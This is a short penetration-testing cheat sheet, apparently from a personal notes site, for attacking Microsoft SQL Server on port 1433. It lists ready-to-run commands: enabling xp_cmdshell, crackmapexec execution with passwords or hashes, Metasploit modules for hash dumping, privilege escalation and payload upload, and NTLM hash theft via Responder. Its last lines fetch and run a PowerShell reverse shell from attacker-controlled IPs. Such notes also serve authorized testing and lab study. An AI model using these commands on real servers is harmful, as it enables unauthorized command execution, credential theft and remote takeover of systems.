Powered by

# Port 1433 - MSSQL

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications which may run either on the same computer or on another computer across a network (including the Internet).

# Execute Commands 

# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"

# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE

# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

# Metasploit 

# Steal NTLM hash, before executing run Responder
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer 
# Set USERNAME, RHOSTS and PASSWORD
# Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

# Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

# Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

# Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

# Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

# Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

# With Credentials

# Impacket

You can login into the service using impacket mssqlclient.py.

mssqlclient.py  -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine

#Once logged in you can run queries:
SQL> select @@ version;

#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat

#Try to enable code execution
SQL> enable_xp_cmdshell

#Execute code, 2 sintax, for complex and non complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# SQSH 

sqsh -S <IP> -U <Username> -P <Password> -D <Database>

1. try and see if it works
        > xp_cmdshell `whoami`
        > go

    2. try to turn component back on
        > EXEC SP_CONFIGURE 'xp_cmdshell' , 1
        > reconfigure
        > go
        > xp_cmdshell `whoami`
        > go

    3. 'advanced' turn it back on
        > EXEC SP_CONFIGURE 'show advanced options', 1
        > reconfigure
        > go
        > EXEC SP_CONFIGURE 'xp_cmdshell' , 1
        > reconfigure
        > go
        > xp_cmdshell 'whoami'
        > go

# If RCE works we can get a reverse shell
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/revshell.ps1')"

© Copyright 2024. Caue All rights reserved.